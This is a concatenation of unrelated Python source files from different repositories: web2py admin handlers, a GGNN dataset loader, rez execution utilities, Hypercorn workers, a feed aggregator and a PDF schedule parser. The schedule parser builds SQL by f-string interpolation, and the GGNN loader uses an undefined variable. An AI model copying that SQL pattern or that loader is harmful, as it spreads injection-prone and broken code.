tryFile = path.replace('\\', '/')
if os.path.isabs(tryFile) and os.path.isfile(tryFile):
(folder, filename) = os.path.split(tryFile)
(base, ext) = os.path.splitext(filename)
app = get_app()
editable = {'controllers': '.py', 'models': '.py', 'views': '.html'}
for key in editable.keys():
check_extension = folder.endswith("%s/%s" % (app, key))
if ext.lower() == editable[key] and check_extension:
return to_native(A('"' + tryFile + '"',
_href=URL(r=request,
f='edit/%s/%s/%s' % (app, key, filename))).xml())
return ''
def make_links(traceback):
""" Make links using the given traceback """
lwords = traceback.split('"')
# Making the short circuit compatible with <= python2.4
result = (len(lwords) != 0) and lwords[0] or ''
i = 1
while i < len(lwords):
link = make_link(lwords[i])
if link == '':
result += '"' + lwords[i]
else:
result += link
if i + 1 < len(lwords):
result += lwords[i + 1]
i = i + 1
i = i + 1
return result
class TRACEBACK(object):
""" Generate the traceback """
def __init__(self, text):
""" TRACEBACK constructor """
self.s = make_links(CODE(text).xml())
def xml(self):
""" Returns the xml """
return self.s
def ticket():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
e.load(request, app, ticket)
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def ticketdb():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
request.tickets_db = get_ticket_storage(app)[0]
e.load(request, app, ticket)
response.view = 'default/ticket.html'
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def error():
""" Generate a ticket (for testing) """
raise RuntimeError('admin ticket generator at your service')
def update_languages():
""" Update available languages """
app = get_app()
update_all_languages(apath(app, r=request))
session.flash = T('Language files (static strings) updated')
redirect(URL('design', args=app, anchor='languages'))
def user():
if MULTI_USER_MODE:
if not db(db.auth_user).count():
auth.settings.registration_requires_approval = False
return dict(form=auth())
else:
return dict(form=T("Disabled"))
def reload_routes():
""" Reload routes.py """
gluon.rewrite.load()
redirect(URL('site'))
def manage_students():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
db.auth_user.registration_key.writable = True
grid = SQLFORM.grid(db.auth_user)
return locals()
def bulk_register():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
form = SQLFORM.factory(Field('emails', 'text'))
if form.process().accepted:
emails = [x.strip() for x in form.vars.emails.split('\n') if x.strip()]
n = 0
for email in emails:
if not db.auth_user(email=email):
n += db.auth_user.insert(email=email) and 1 or 0
session.flash = T('%s students registered', n)
redirect(URL('site'))
return locals()
# Begin experimental stuff need fixes:
# 1) should run in its own process - cannot os.chdir
# 2) should not prompt user at console
# 3) should give option to force commit and not reuqire manual merge
def git_pull():
""" Git Pull handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
dialog = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if dialog.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
origin = repo.remotes.origin
origin.fetch()
origin.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain files could not be checked out. Check logs for details.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for details.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def git_push():
""" Git Push handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
form = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
form.element('input[type=submit]')['_value'] = T('Push')
form.add_button(T('Cancel'), URL('site'))
form.process()
if form.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
index = repo.index
index.add([apath(r=request) + app + '/*'])
new_commit = index.commit(form.vars.changelog)
origin = repo.remotes.origin
origin.push()
session.flash = T(
"Git repo updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(app=app, form=form)
def plugins():
app = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
rawlist = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=plugin&search_index=false").read()
session.plugins = loads_json(rawlist)
except:
response.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(plugins=session.plugins["results"], app=request.args(0))
def install_plugin():
app = request.args(0)
source = request.vars.source
plugin = request.vars.plugin
if not (source and app):
raise HTTP(500, T("Invalid request"))
# make sure no XSS attacks in source
if not source.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
form = SQLFORM.factory()
result = None
if form.process().accepted:
# get w2p plugin
if "web2py.plugin." in source:
filename = "web2py.plugin.%s.w2p" % \
source.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
filename = "web2py.plugin.%s.w2p" % cleanpath(plugin)
if plugin_install(app, urlopen(source),
request, filename):
session.flash = T('New plugin installed: %s', filename)
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(f="plugins", args=[app, ]))
return dict(form=form, app=app, plugin=plugin, source=source)
| 37.259075
| 195
| 0.5483
|
4a1431efd3ae0c0e312c0f37bb9602947b5ee419
| 7,289
|
py
|
Python
|
utils/data/wy_dataset4.py
|
WuYff/ggnn.pytorch
|
795bc7fb51876231406d71610aa5ec7ed29865c0
|
[
"MIT"
] | null | null | null |
utils/data/wy_dataset4.py
|
WuYff/ggnn.pytorch
|
795bc7fb51876231406d71610aa5ec7ed29865c0
|
[
"MIT"
] | null | null | null |
utils/data/wy_dataset4.py
|
WuYff/ggnn.pytorch
|
795bc7fb51876231406d71610aa5ec7ed29865c0
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
# Can we assign -1 ? maybe it is better than 0.
# data structure index starts from zero but node id value should start from one.
# output a whole matrix
def load_graphs_from_file(path: str,how_many:int) -> (list, int):
data_list = []
max_node_id = 0
path_list=os.listdir(path)
key="graph"
skip_init = True
count_ini =0
for filename in path_list:
if key in filename:
file = path + filename[:-10]
# print("file: "+filename[:-10])
if os.path.exists(file + "_graph.txt"):
edge_list = []
label_list = []
target_list = []
max_node_of_one_graph = 0
# [source node, target node]
with open(file + "_graph.txt", 'r') as f:
lines = f.readlines() # 读取所有行
last_line = lines[-1] # 取最后一行
n = last_line.split(" ")
node = int(n[0])
if skip_init and ((len(lines) == 3 and node == 3) or node > how_many ):
count_ini +=1
continue
for line in lines:
line_tokens = line.split(" ")
for i in range(1, len(line_tokens)):
digits = [int(line_tokens[0]), 1, 0]
if line_tokens[i] == "\n":
continue
node_id = int(line_tokens[i])
digits[2] = node_id
if node_id > max_node_id:
max_node_id = node_id
if node_id > max_node_of_one_graph:
max_node_of_one_graph = node_id
edge_list.append(digits)
# [node, rd1, rd2,....]
with open(file + "_target.txt", 'r') as f:
for line in f:
digits = []
line_tokens = line.split(" ")
for i in range(0, len(line_tokens)):
if line_tokens[i] == "\n":
continue
digits.append(int(line_tokens[i]))
target_list.append(digits) # [[,,,][,,][,,]]
# [node,variable]
with open(file + "_node_variable.txt", 'r') as f:
for line in f:
digits = [0, 0]
line_tokens = line.split(" ")
digits[0] = int(line_tokens[0])
digits[1] = int(line_tokens[1])
label_list.append(digits)
data_list.append([edge_list, label_list, target_list,max_node_of_one_graph])
print("totoal data : ", len(data_list))
return (data_list, max_node_id)
def split_set(data_list:list):
n_examples = len(data_list)
idx = range(n_examples)
num = round(n_examples*0.6)
t= round(n_examples*0.2)
train = idx[:num]
test = idx[num: num+t]
val = idx[num+t:]
return np.array(data_list)[train], np.array(data_list)[val], np.array(data_list)[test]
def data_convert(data_list: list, n_annotation_dim: int, n_nodes: int):
n_tasks = 1
task_data_list = []
for i in range(n_tasks):
task_data_list.append([])
for item in data_list:
edge_list = item[0]
label_list = item[1]
target_list = item[2]
max_node_of_one_graph = item[3]
task_type = 1
task_output = create_task_output(target_list, n_nodes) # 原来是一个int,现在变成了长度为node_n * node_n 的 list
annotation = np.zeros([n_nodes, n_annotation_dim])
# annotation[target[1] - 1][0] = 1 # 你需要自己定义 annotation 和 n_annotation_dim
annotation = create_annotation_output(label_list, annotation)
task_data_list[task_type - 1].append([edge_list, annotation, task_output, max_node_of_one_graph])
return task_data_list
# Notice that the rd_id >= 1. Because zero means the corresponding node does not reach the current node
# return target[ r0_1,r0_2,.....rn_1, ..., rn_n] with length = V*V
def create_task_output(target_list: list, n_nodes: int) -> np.array:
a = np.zeros((n_nodes, n_nodes))
# print("n_nodes",n_nodes)
# print("target_list",target_list)
for each_node_rd in target_list:
# print("each_node_rd",each_node_rd)
for rd_id in each_node_rd[1:]:
a[each_node_rd[0] - 1][rd_id - 1] = 1
b = np.zeros(n_nodes*n_nodes)
for i in range(n_nodes):
for j in range(n_nodes):
b[i*n_nodes+j] = a[i][j]
return b
# return annotation matrix [V, 1] (current annotation dim =1)
def create_annotation_output(label_list: list, annotation):
for each_node_varible in label_list:
annotation[each_node_varible[0] - 1][0] = each_node_varible[1]
return annotation
# return adjacency matrix[V,V]
def create_adjacency_matrix(edges, n_nodes, n_edge_types): # 我感觉应该就是一个点的in边 和 out边都记录了
a = np.zeros([n_nodes, n_nodes * n_edge_types * 2])
for edge in edges:
src_idx = edge[0]
e_type = edge[1]
tgt_idx = edge[2]
a[tgt_idx - 1][(e_type - 1) * n_nodes + src_idx - 1] = 1
a[src_idx - 1][(e_type - 1 + n_edge_types) * n_nodes + tgt_idx - 1] = 1
return a
class bAbIDataset():
"""
Load bAbI tasks for GGNN
"""
def __init__(self, path, task_id, is_train,node_number,how_many:int):
self.n_edge_types = 1
self.n_tasks = 1
all_data, self.n_node = load_graphs_from_file(path,how_many)
# all_task_train_data, all_task_val_data, all_task_test_data = split_set(all_data)
# if is_train == "t":
# print("prepare train data")
# all_task_train_data = data_convert(all_task_train_data, 1, self.n_node)
# self.data = all_task_train_data[task_id]
# elif is_train == "v":
# print("prepare validation data")
# self.n_node = node_number
# all_task_val_data = data_convert(all_task_val_data, 1, self.n_node)
# self.data = all_task_val_data[task_id]
# else:
# print("prepare test data")
# self.n_node = node_number
# all_task_test_data = data_convert(all_task_test_data, 1, self.n_node)
# self.data = all_task_test_data[task_id]
print("prepare data")
all_task_data = data_convert(all_task_train_data, 1, self.n_node)
def __getitem__(self, index):
am = create_adjacency_matrix(self.data[index][0], self.n_node, self.n_edge_types)
annotation = self.data[index][1]
target = self.data[index][2]
max_node_of_one_graph = self.data[index][3] # my: list , his: int
return am, annotation, target, max_node_of_one_graph
def __len__(self):
return len(self.data)
if __name__ == "__main__":
train_dataset = bAbIDataset("", 0, True)
am, annotation, target, max_node_of_one_graph= train_dataset.__getitem__(0)
print("am", am) # [v,v]
print("annotation", annotation) # [v,1]
print("target", target) #[v*v]
## 写文档!
| 40.049451
| 105
| 0.557278
|
4a14325d85a1e08181620a16eb0d3d4492ce20b7
| 8,869
|
py
|
Python
|
src/rez/utils/execution.py
|
alexey-pelykh/rez
|
ad12105d89d658e4d2ea9249e537b3de90391f0e
|
[
"Apache-2.0"
] | null | null | null |
src/rez/utils/execution.py
|
alexey-pelykh/rez
|
ad12105d89d658e4d2ea9249e537b3de90391f0e
|
[
"Apache-2.0"
] | null | null | null |
src/rez/utils/execution.py
|
alexey-pelykh/rez
|
ad12105d89d658e4d2ea9249e537b3de90391f0e
|
[
"Apache-2.0"
] | null | null | null |
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
"""
Utilities related to process/script execution.
"""
from rez.vendor.six import six
from rez.utils.yaml import dump_yaml
from rez.vendor.enum import Enum
from contextlib import contextmanager
import subprocess
import sys
import stat
import os
import io
@contextmanager
def add_sys_paths(paths):
"""Add to sys.path, and revert on scope exit.
"""
original_syspath = sys.path[:]
sys.path.extend(paths)
try:
yield
finally:
sys.path = original_syspath
if six.PY2:
class _PopenBase(subprocess.Popen):
def __enter__(self):
return self
def __exit__(self, exc_type, value, traceback):
self.wait()
else: # py3
_PopenBase = subprocess.Popen
class Popen(_PopenBase):
"""subprocess.Popen wrapper.
Allows for Popen to be used as a context in both py2 and py3.
"""
def __init__(self, args, **kwargs):
# Avoids python bug described here: https://bugs.python.org/issue3905.
# This can arise when apps (maya) install a non-standard stdin handler.
#
# In newer version of maya and katana, the sys.stdin object can also
# become replaced by an object with no 'fileno' attribute, this is also
# taken into account.
#
if "stdin" not in kwargs:
try:
file_no = sys.stdin.fileno()
# https://github.com/nerdvegas/rez/pull/966
except (AttributeError, io.UnsupportedOperation):
file_no = None
if file_no is None and sys.__stdin__ is not None:
file_no = sys.__stdin__.fileno()
if file_no not in (0, 1, 2):
kwargs["stdin"] = subprocess.PIPE
# Add support for the new py3 "text" arg, which is equivalent to
# "universal_newlines".
# https://docs.python.org/3/library/subprocess.html#frequently-used-arguments
#
text = kwargs.pop("text", None)
universal_newlines = kwargs.pop("universal_newlines", None)
if text or universal_newlines:
kwargs["universal_newlines"] = True
# fixes py3/cmd.exe UnicodeDecodeError() with some characters.
# UnicodeDecodeError: 'charmap' codec can't decode byte
# 0x8d in position 1023172: character maps to <undefined>
#
# NOTE: currently no solution for `python3+<3.6`
#
if sys.version_info[:2] >= (3, 6) and "encoding" not in kwargs:
kwargs["encoding"] = "utf-8"
super(Popen, self).__init__(args, **kwargs)
class ExecutableScriptMode(Enum):
"""
Which scripts to create with util.create_executable_script.
"""
# Start with 1 to not collide with None checks
# Requested script only. Usually extension-less.
single = 1
# Create .py script that will allow launching scripts on
# windows without extension, but may require extension on
# other systems.
py = 2
# Will create py script on windows and requested on
# other platforms
platform_specific = 3
# Creates the requested script and an .py script so that scripts
# can be launched without extension from windows and other
# systems.
both = 4
# TODO: Maybe also allow distlib.ScriptMaker instead of the .py + PATHEXT.
def create_executable_script(filepath, body, program=None, py_script_mode=None):
"""
Create an executable script. In case a py_script_mode has been set to create
a .py script the shell is expected to have the PATHEXT environment
variable to include ".PY" in order to properly launch the command without
the .py extension.
Args:
filepath (str): File to create.
body (str or callable): Contents of the script. If a callable, its code
is used as the script body.
program (str): Name of program to launch the script. Default is 'python'
py_script_mode(ExecutableScriptMode): What kind of script to create.
Defaults to rezconfig.create_executable_script_mode.
Returns:
List of filepaths of created scripts. This may differ from the supplied
filepath depending on the py_script_mode
"""
from rez.config import config
from rez.utils.platform_ import platform_
program = program or "python"
py_script_mode = py_script_mode or config.create_executable_script_mode
# https://github.com/nerdvegas/rez/pull/968
is_forwarding_script_on_windows = (
program == "_rez_fwd"
and platform_.name == "windows"
and filepath.lower().endswith(".cmd")
)
if callable(body):
from rez.utils.sourcecode import SourceCode
code = SourceCode(func=body)
body = code.source
if not body.endswith('\n'):
body += '\n'
# Windows does not support shebang, but it will run with
# default python, or in case of later python versions 'py' that should
# try to use sensible python interpreters depending on the shebang line.
# Compare PEP-397.
# In order for execution to work in windows we need to create a .py
# file and set the PATHEXT to include .py (as done by the shell plugins)
# So depending on the py_script_mode we might need to create more then
# one script
script_filepaths = [filepath]
if program == "python":
script_filepaths = _get_python_script_files(filepath, py_script_mode,
platform_.name)
for current_filepath in script_filepaths:
with open(current_filepath, 'w') as f:
# TODO: make cross platform
if is_forwarding_script_on_windows:
# following lines of batch script will be stripped
# before yaml.load
f.write("@echo off\n")
f.write("%s.exe %%~dpnx0 %%*\n" % program)
f.write("goto :eof\n") # skip YAML body
f.write(":: YAML\n") # comment for human
else:
f.write("#!/usr/bin/env %s\n" % program)
f.write(body)
# TODO: Although Windows supports os.chmod you can only set the readonly
# flag. Setting the file readonly breaks the unit tests that expect to
# clean up the files once the test has run. Temporarily we don't bother
# setting the permissions, but this will need to change.
if os.name == "posix":
os.chmod(
current_filepath,
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IXUSR
| stat.S_IXGRP | stat.S_IXOTH
)
return script_filepaths
def _get_python_script_files(filepath, py_script_mode, platform):
"""
Evaluates the py_script_mode for the requested filepath on the given
platform.
Args:
filepath: requested filepath
py_script_mode (ExecutableScriptMode):
platform (str): Platform to evaluate the script files for
Returns:
list of str: filepaths of scripts to create based on inputs
"""
script_filepaths = []
base_filepath, extension = os.path.splitext(filepath)
has_py_ext = extension == ".py"
is_windows = platform == "windows"
if (
py_script_mode == ExecutableScriptMode.single
or py_script_mode == ExecutableScriptMode.both
or (py_script_mode == ExecutableScriptMode.py and has_py_ext)
or (py_script_mode == ExecutableScriptMode.platform_specific and not is_windows)
or (py_script_mode == ExecutableScriptMode.platform_specific and is_windows and has_py_ext)
):
script_filepaths.append(filepath)
if (
not has_py_ext
and (
py_script_mode == ExecutableScriptMode.both
or py_script_mode == ExecutableScriptMode.py
or (py_script_mode == ExecutableScriptMode.platform_specific and is_windows)
)
):
script_filepaths.append(base_filepath + ".py")
return script_filepaths
def create_forwarding_script(filepath, module, func_name, *nargs, **kwargs):
"""Create a 'forwarding' script.
A forwarding script is one that executes some arbitrary Rez function. This
is used internally by Rez to dynamically create a script that uses Rez,
even though the parent environment may not be configured to do so.
"""
from rez.utils.platform_ import platform_
if platform_.name == "windows" and \
os.path.splitext(filepath)[-1].lower() != ".cmd":
filepath += ".cmd"
doc = dict(
module=module,
func_name=func_name)
if nargs:
doc["nargs"] = nargs
if kwargs:
doc["kwargs"] = kwargs
body = dump_yaml(doc)
create_executable_script(filepath, body, "_rez_fwd")
| 33.342105
| 99
| 0.642801
|
4a14327767ffb4a5a62e369f04814176c84959d4
| 1,612
|
py
|
Python
|
generate.py
|
hrw/very-simple-planet-aggregator
|
d3c9f8497a60d102d8789c442541d3322da09b87
|
[
"MIT"
] | 3
|
2020-01-21T20:10:19.000Z
|
2020-05-26T08:53:16.000Z
|
generate.py
|
hrw/very-simple-planet-aggregator
|
d3c9f8497a60d102d8789c442541d3322da09b87
|
[
"MIT"
] | 1
|
2020-01-22T09:04:43.000Z
|
2020-01-22T11:05:28.000Z
|
generate.py
|
hrw/very-simple-planet-aggregator
|
d3c9f8497a60d102d8789c442541d3322da09b87
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# SPDX-License-Identifier: MIT
from datetime import datetime
from jinja2 import Environment, FileSystemLoader
import sqlite3
import time
MAX_ENTRIES_PER_FEED = 8
def filter_date(value, format='%d %B %Y'):
return time.strftime(format, time.strptime(value, '%Y-%m-%d %H:%M:%S'))
conn = sqlite3.connect('feeds.db')
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('''SELECT name, url, etag, modified, id, blog_url
FROM feeds
ORDER BY name''')
feeds = c.fetchall()
c.execute('''SELECT f.name, f.blog_url, f.title as blog_title,
p.feed_id, p.title, p.url, p.post, p.published_date,
p.author
FROM posts p, feeds f
WHERE f.id = p.feed_id
ORDER by p.published_date DESC
LIMIT 20''')
posts = c.fetchall()
conn.close()
file_loader = FileSystemLoader('templates')
env = Environment(loader=file_loader)
env.filters['date'] = filter_date
template = env.get_template('index.html.j2')
output = template.render(generate_time=datetime.strftime(datetime.utcnow(),
"%d %B %Y %H:%M"),
posts=posts, feeds=feeds)
with open('index.html', 'w') as html:
html.write(output)
template = env.get_template('rss20.xml.j2')
output = template.render(generate_time=datetime.strftime(datetime.utcnow(),
"%d %B %Y %H:%M"),
posts=posts, feeds=feeds)
with open('rss20.xml', 'w') as rss:
rss.write(output)
| 25.587302
| 75
| 0.590571
|
4a1433e7af3a8ee2eeb57b2aa913e6fda0beb0c8
| 3,247
|
py
|
Python
|
advance_schedule.py
|
ethoel/pdf-to-db
|
db1a8a0d0d52405b394cf47df9fb38727afb34e6
|
[
"MIT"
] | null | null | null |
advance_schedule.py
|
ethoel/pdf-to-db
|
db1a8a0d0d52405b394cf47df9fb38727afb34e6
|
[
"MIT"
] | null | null | null |
advance_schedule.py
|
ethoel/pdf-to-db
|
db1a8a0d0d52405b394cf47df9fb38727afb34e6
|
[
"MIT"
] | null | null | null |
import re
import camelot
import sqlite3
from datetime import datetime
from datetime import date, timedelta
# download pdf with wget
# decrypt pdf with qpdf
# qpdf --password=5290 --decrypt test.pdf camtest.pdf
# convert pdf to text, can consider decreasing 5 if issues
# pdftotext -opw 5290 -fixed 5 test.pdf
# open pdftotext file
lines = []
with open('advance_schedule.txt') as f:
lines = f.readlines()
# create or connect to database and create assignments table if not exist
connection = sqlite3.connect('schedule.db')
cursor = connection.cursor();
cursor.execute('''
CREATE TABLE IF NOT EXISTS assignments (
assignment_id INTEGER PRIMARY KEY,
date TEXT NOT NULL,
anesthesiologist TEXT NOT NULL,
assignment TEXT NOT NULL,
UNIQUE(date, anesthesiologist));''')
# get the first date in advance schedule, table 0, row 2, value 0
#raw_date = tables[0][2][0]
#raw_date = raw_date.split('/')
# create a date from raw_date passing year, month, day
#first_date = date(int(raw_date[2]), int(raw_date[0]), int(raw_date[1]))
# get the first assignment date
raw_date = lines[2].split(maxsplit=1)[0].strip()
split_date = raw_date.split('/')
first_date = date(int(split_date[2]), int(split_date[0]), int(split_date[1]))
tables = []
rows = []
keep_row = False
for line in lines:
if not line.strip(): continue
header = line.split(maxsplit=1)[0].strip()
if header == '*': continue
if header == raw_date: keep_row = True
if header == 'W':
tables.append(rows)
rows = []
keep_row = False
if keep_row: rows.append(line.strip('\n'))
# parse the text version of the assignments
for table in tables:
# find the end index after match
# end_indices = [match.end() for match in re.finditer("\S\S*", table[0])]
end_indices = []
matches = re.finditer("\S\S*", table[0])
# skip first match and add the start of second instead
next(matches)
second_match = next(matches)
end_indices.append(second_match.start() - 1)
end_indices.append(second_match.end())
for match in matches:
end_indices.append(match.end())
# no need for divider at very end
end_indices = end_indices[:-1]
# add dividers to the table
for k, row in enumerate(table):
for i in end_indices:
row = row[:i] + '|' + row[i+1:]
# split along those dividers
print(row)
table[k] = [value.strip() for value in row.split('|')]
for table in tables:
for row in table[1:]:
anes = row[0].split('/')[::-1][0].strip()
print(len(row), end=' ')
print(anes, end=' ')
print(row[1:])
# set the date to the first date of the table
cur_date = first_date
# add the assignments for each anesthesiologist
for assignment in row[1:]:
assignment = assignment.strip()
cursor.execute(f'''
REPLACE INTO assignments (date, anesthesiologist, assignment)
VALUES ('{cur_date}', '{anes}', '{assignment}');''');
cur_date = cur_date + timedelta(days=1)
# initialize the first date for the next table
first_date = cur_date
connection.commit()
connection.close()
| 32.47
| 77
| 0.638743
|
4a14347f545b78f6d2a5ed830b21f4aa0356a37a
| 5,404
|
py
|
Python
|
src/hypercorn/workers.py
|
nonebot/nonecorn
|
813408d385f11b6bbdaee63d6b6ace8c87586d25
|
[
"MIT"
] | 2
|
2021-11-29T05:56:51.000Z
|
2022-02-07T06:27:24.000Z
|
src/hypercorn/workers.py
|
nonebot/nonecorn
|
813408d385f11b6bbdaee63d6b6ace8c87586d25
|
[
"MIT"
] | 3
|
2021-11-08T11:58:51.000Z
|
2021-12-09T11:29:54.000Z
|
src/hypercorn/workers.py
|
nonebot/nonecorn
|
813408d385f11b6bbdaee63d6b6ace8c87586d25
|
[
"MIT"
] | null | null | null |
from typing import List, Callable, Awaitable, Any
import asyncio
import signal
from functools import partial
from gunicorn.workers.base import Worker
from gunicorn.sock import TCPSocket
from hypercorn.config import Config as _Config, Sockets
from hypercorn.asyncio import serve as asyncio_serve
class Config(_Config):
sockets: Sockets = None
def create_sockets(self) -> Sockets:
return self.sockets
def transfer_sock(gunicorn_sock: List[TCPSocket]) -> Sockets:
secure_sockets = []
insecure_sockets = []
for sock in gunicorn_sock:
if sock.conf.is_ssl:
secure_sockets.append(sock.sock)
else:
insecure_sockets.append(sock.sock)
return Sockets(secure_sockets=secure_sockets, insecure_sockets=insecure_sockets, quic_sockets=[])
class HypercornAsyncioWorker(Worker):
"""
Borrowed from uvicorn
"""
CONFIG_KWARGS = {"worker_class": "asyncio"}
def __init__(self, *args, **kwargs):
super(HypercornAsyncioWorker, self).__init__(*args, **kwargs)
config_kwargs = {
"access_log_format": self.cfg.access_log_format,
"accesslog": self.cfg.accesslog,
"alpn_protocols": self.cfg.alpn_protocols,
"alt_svc_headers": self.cfg.alt_svc_headers,
"debug": self.cfg.debug,
"loglevel": self.cfg.loglevel.upper(),
"errorlog": self.cfg.errorlog,
"logconfig": self.cfg.logconfig,
"keep_alive_timeout": self.cfg.keepalive,
"graceful_timeout": self.cfg.graceful_timeout,
"group": self.cfg.group,
"dogstatsd_tags": self.cfg.dogstatsd_tags,
"statsd_host": self.cfg.statsd_host,
"statsd_prefix": self.cfg.statsd_prefix,
"umask": self.cfg.umask,
"user": self.cfg.user,
"h11_max_incomplete_size": self.cfg.h11_max_incomplete_size,
"h2_max_concurrent_streams": self.cfg.h2_max_concurrent_streams,
"h2_max_header_list_size": self.cfg.h2_max_header_list_size,
"h2_max_inbound_frame_size": self.cfg.h2_max_inbound_frame_size,
"include_server_header": self.cfg.include_server_header,
"logger_class": self.cfg.logger_class,
"max_app_queue_size": self.cfg.max_app_queue_size,
"pid_path": self.cfg.pid_path,
"root_path": self.cfg.root_path,
"server_names": self.cfg.server_names,
"shutdown_timeout": self.cfg.shutdown_timeout,
"ssl_handshake_timeout": self.cfg.ssl_handshake_timeout,
"startup_timeout": self.cfg.startup_timeout,
"verify_flags": self.cfg.verify_flags,
"verify_mode": self.cfg.verify_mode,
"websocket_max_message_size": self.cfg.websocket_max_message_size,
"websocket_ping_interval": self.cfg.websocket_ping_interval,
}
config_kwargs.update(logconfig_dict=self.cfg.logconfig_dict if self.cfg.logconfig_dict else None)
if self.cfg.is_ssl:
ssl_kwargs = {
"keyfile": self.cfg.ssl_options.get("keyfile"),
"certfile": self.cfg.ssl_options.get("certfile"),
"ca_certs": self.cfg.ssl_options.get("ca_certs"),
}
if self.cfg.ssl_options.get("ciphers") is not None:
ssl_kwargs.update(ciphers=self.cfg.ssl_options.get("ciphers"))
config_kwargs.update(ssl_kwargs)
if self.cfg.settings["backlog"].value:
config_kwargs["backlog"] = self.cfg.settings["backlog"].value
config_kwargs.update(self.CONFIG_KWARGS)
self.config = Config() # todo
for k, v in config_kwargs.items():
if v is not None:
setattr(self.config, k, v)
def init_signals(self):
for s in self.SIGNALS:
signal.signal(s, signal.SIG_DFL)
def run(self):
asgi_app = self.wsgi
self.config.sockets = transfer_sock(self.sockets)
if self.config.worker_class == "trio":
from hypercorn.trio import serve as trio_serve
import trio
async def start():
async with trio.open_nursery() as nursery:
async def wrap(func: Callable[[], Awaitable[Any]]) -> None:
await func()
nursery.cancel_scope.cancel()
nursery.start_soon(wrap, partial(trio_serve, asgi_app, self.config))
await wrap(self.trio_callback_notify)
trio.run(start)
return
if self.config.worker_class == "uvloop":
import uvloop
uvloop.install()
asyncio.run(asyncio.wait([asyncio_serve(asgi_app, self.config),
self.asyncio_callback_notify()],
return_when=asyncio.FIRST_COMPLETED))
async def asyncio_callback_notify(self):
while True:
self.notify()
await asyncio.sleep(self.timeout)
async def trio_callback_notify(self):
import trio
while True:
self.notify()
await trio.sleep(self.timeout)
class HypercornUvloopWorker(HypercornAsyncioWorker):
CONFIG_KWARGS = {"worker_class": "uvloop"}
class HypercornTrioWorker(HypercornAsyncioWorker):
CONFIG_KWARGS = {"worker_class": "trio"}
| 37.79021
| 105
| 0.626388
|
4a143516a154185859a42455e60a96ec0630b4ea
| 586
|
py
|
Python
|
bin/pargec_gen.py
|
spiccinini/pargec
|
28257bda4209bc5d72eeb536fdd0e0ae1361aaa9
|
[
"MIT"
] | null | null | null |
bin/pargec_gen.py
|
spiccinini/pargec
|
28257bda4209bc5d72eeb536fdd0e0ae1361aaa9
|
[
"MIT"
] | null | null | null |
bin/pargec_gen.py
|
spiccinini/pargec
|
28257bda4209bc5d72eeb536fdd0e0ae1361aaa9
|
[
"MIT"
] | null | null | null |
import os
import imp
import sys
import argparse
from pargec.c_generator import generate
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('protocol_file', help='path of the proto.py')
parser.add_argument('output_header')
parser.add_argument('output_source')
parser.add_argument('basename', help='name prefix')
parser.add_argument('-p', "--python", help='generate python wrapper')
args = parser.parse_args()
generate(args.protocol_file, args.output_header, args.output_source,
args.python, args.basename)
| 27.904762
| 73
| 0.725256
|
4a14363ff1db48a5072cbb5f5eb3bc9241ffca8f
| 6,291
|
py
|
Python
|
benchmark/paddle/image/resnet.py
|
hero9968/PaddlePaddle-book
|
1ff47b284c565d030b198705d5f18b4bd4ce53e5
|
[
"Apache-2.0"
] | 3
|
2018-04-16T23:35:32.000Z
|
2019-08-12T01:01:07.000Z
|
benchmark/paddle/image/resnet.py
|
hero9968/PaddlePaddle-book
|
1ff47b284c565d030b198705d5f18b4bd4ce53e5
|
[
"Apache-2.0"
] | null | null | null |
benchmark/paddle/image/resnet.py
|
hero9968/PaddlePaddle-book
|
1ff47b284c565d030b198705d5f18b4bd4ce53e5
|
[
"Apache-2.0"
] | 2
|
2020-11-04T08:07:46.000Z
|
2020-11-06T08:33:24.000Z
|
#!/usr/bin/env python
from paddle.trainer_config_helpers import *
height = 224
width = 224
num_class = 1000
batch_size = get_config_arg('batch_size', int, 64)
layer_num = get_config_arg("layer_num", int, 50)
is_infer = get_config_arg("is_infer", bool, False)
args = {
